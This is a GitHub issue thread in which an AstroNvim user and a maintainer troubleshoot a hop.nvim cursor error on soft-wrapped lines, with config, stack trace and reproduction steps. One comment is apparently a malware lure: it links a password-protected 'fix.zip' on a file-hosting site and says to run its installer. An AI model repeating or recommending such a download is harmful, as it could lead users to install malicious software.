### ISSUE TITLE
Getting a 'Column value outside range' when using hop plugin on a soft wrapped line

### ISSUE THREAD

**Issue by brneor** [AstroNvim/AstroNvim#2693]
### Checklist

- [X] I have searched through the AstroNvim docs
- [X] I have searched through the existing issues of AstroNvim
- [X] I have searched the existing issues of plugins related to this issue
- [X] I have run `:Lazy update` and are on the latest version of AstroNvim
- [X] I can replicate the bug with the minimal `repro.lua` provided below

### Operating system/version

Fedora 40 on WSL

### Terminal/GUI

Windows Terminal

### AstroNvim Health

```
astronvim: require("astronvim.health").check()

AstroNvim ~
- AstroNvim Version: v4.23.11
- Neovim Version: v0.10.1
- OK Using stable Neovim >= 0.9.5
- OK `git` is installed: Used for core functionality such as updater and plugin management
- OK `xdg-open` is installed: Used for `gx` mapping for opening files with system opener (Optional)
- OK `rg` is installed: Used for Telescope `live_grep` picker, `<Leader>fw` and `<Leader>fW` by default (Optional)
- OK `lazygit` is installed: Used for mappings to pull up git TUI (Optional)
- OK `node` is installed: Used for mappings to pull up node REPL (Optional)
- WARNING `gdu/gdu_windows_amd64.exe` is not installed: Used for mappings to pull up disk usage analyzer (Optional)
- OK `btm` is installed: Used for mappings to pull up system monitor (Optional)
- OK `python` is installed: Used for mappings to pull up python REPL (Optional)
```

### Describe the bug

When I try to use the remaps to `t` and `T` from [hop.nvim](https://github.com/smoka7/hop.nvim) on a line that is soft wrapped I get an error:

```
E5108: Error executing lua: /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:239: Column value outside
 range
stack traceback:
        [C]: in function 'nvim_win_set_cursor'
        /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:239: in function 'move_cursor_to'
        /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:259: in function 'callback'
        /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:363: in function 'refine_hints'
        /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:327: in function 'hint_with_callback'
        /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:258: in function 'hint_with_regex'
        /root/.local/share/nvim/lazy/hop.nvim/lua/hop/init.lua:447: in function 'hint_char1'
        /root/.config/nvim/lua/plugins/hop.lua:51: in function </root/.config/nvim/lua/plugins/hop.lua:50>
```

I cannot reproduce this error on a clean nvim setup, but I can reproduce with a clean AstroNvim setup installing just hop, which led me to think it is not a hop issue.

### Steps to Reproduce

1. Install hop.nvim
2. Map `t` to `<cmd>:lua require'hop'.hint_char1({direction = require'hop.hint'.HintDirection.AFTER_CURSOR,current_line_only = true, hint_offset = -1})<cr>`
3. Open any file that has a long line
4. `set wrap`
5. Go to the start of the long line, type `t`, a character that's on the wrapped part of the line and then the hop hint letter.

### Expected behavior

Cursor should jump to chosen character.

### Screenshots

https://github.com/user-attachments/assets/a50c2475-1e2a-4ca7-9e16-97cff9054c64

### Additional Context

Without setting the `hint_offset` the issue does not occurs.

### Repro

```Lua
`lua/plugins/hop.lua`:

return {
  {
    "smoka7/hop.nvim",
    version = "*",
    event = "BufRead",
    config = function()
      require("hop").setup {
        keys = "tnplvmdhsefucwyxriao",
        multi_windows = false,
      }
      vim.api.nvim_set_keymap("", "s", "<cmd>HopWord<cr>", { silent = true })
      vim.api.nvim_set_keymap("", "h", "<cmd>HopChar2<cr>", { silent = true })
      vim.api.nvim_set_keymap("", "L", "<cmd>HopLine<cr>", { silent = true })
      vim.api.nvim_set_keymap("", "l", "<cmd>HopLineStart<cr>", { silent = true })
      vim.api.nvim_set_keymap("", "<C-w>", "<cmd>HopWordCurrentLineAC<cr>", { silent = true })
      vim.api.nvim_set_keymap("", "<C-b>", "<cmd>HopWordCurrentLineBC<cr>", { silent = true })
      vim.api.nvim_set_keymap(
        "",
        "f",
        "<cmd>:lua require'hop'.hint_char1({direction = require'hop.hint'.HintDirection.AFTER_CURSOR,current
_line_only = true})<cr>",
        { silent = true }
      )
      vim.api.nvim_set_keymap(
        "",
        "F",
        "<cmd>:lua require'hop'.hint_char1({direction = require'hop.hint'.HintDirection.BEFORE_CURSOR,curren
t_line_only = true})<cr>",
        { silent = true }
      )
      vim.api.nvim_set_keymap(
        "",
        "t",
        "<cmd>:lua require'hop'.hint_char1({direction = require'hop.hint'.HintDirection.AFTER_CURSOR,current_line_only = true,hint_offset = -1})<cr>",
        { silent = true }
      )
      vim.api.nvim_set_keymap(
        "",
        "T",
        "<cmd>:lua require'hop'.hint_char1({direction = require'hop.hint'.HintDirection.BEFORE_CURSOR,current_line_only = true,hint_offset = 1})<cr>",
        { silent = true }
      )
    end,
  },
}
```

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mehalter** [comment]
Please use the template as provided.

**Comment by brneor** [comment]
@mehalter I'm sorry, I totally misunderstood this part...

**Comment by mehalter** [comment]
No worries! I'll investigate using the config I pasted above 😄 

It's useful just to make sure that things aren't coming from other parts in your config

**Comment by brneor** [comment]
@mehalter that's funny. I just tested inside a docker container (it was the quicker way for me to get a clear neovim install). I can reproduce with the minimal AstroNvim setup but I can't reproduce it with _vanilla_ neovim...

**Comment by mehalter** [comment]
can you send some specific replication steps with a test file or something and I can see?

**Comment by brneor** [comment]
Of course! This is exactly what I did to repro:

1. `docker run --rm -rf ubuntu /bin/bash`
2. `apt update && apt install neovim git`
3. Paste your `repro.lua` _as is_.
4. `nvim -u repro.lua`
5. Opened the file `repro.lua`.
6. `set wrap`
7. Go to start of line 41
8. `t` `<` `n`
9. See the error.

If I try the same repro.lua without the `{ "AstroNvim/AstroNvim", import = "astronvim.plugins" }` line, I can't reproduce it anymore. Note that I have a small terminal window so I can have a smaller buff to wrap the lines.

![image](https://github.com/user-attachments/assets/7676a9d8-f7aa-401d-bf25-4b08141ac77e)

**Comment by mehalter** [comment]
Recording: https://asciinema.org/a/kBlSiSvv1Xn7eCjtIxH7mXs47

Looks like I can replicate in an ubuntu VM actually. But I cannot replicate locally in my linux setup

**Comment by mehalter** [comment]
Seems to be unbelievably brittle. Also found more issues on that repo (the maintained fork) where people run into this: https://github.com/smoka7/hop.nvim/issues/15

I can replicate it and then sometimes when starting it it works totally fine. Really seems like not an AstroNvim thing and just poor code

**Comment by mehalter** [comment]
when printing it shows the column it's supposed to go to is `-1`. This is just basic logic issues in their code. I don't know the problem but it's not something that would come from AstroNvim

**Comment by brneor** [comment]
I'll report on hop's project then. Ty for your attention on this :D

**Comment by mehalter** [comment]
Sorry I'm not much help here in general! 😓
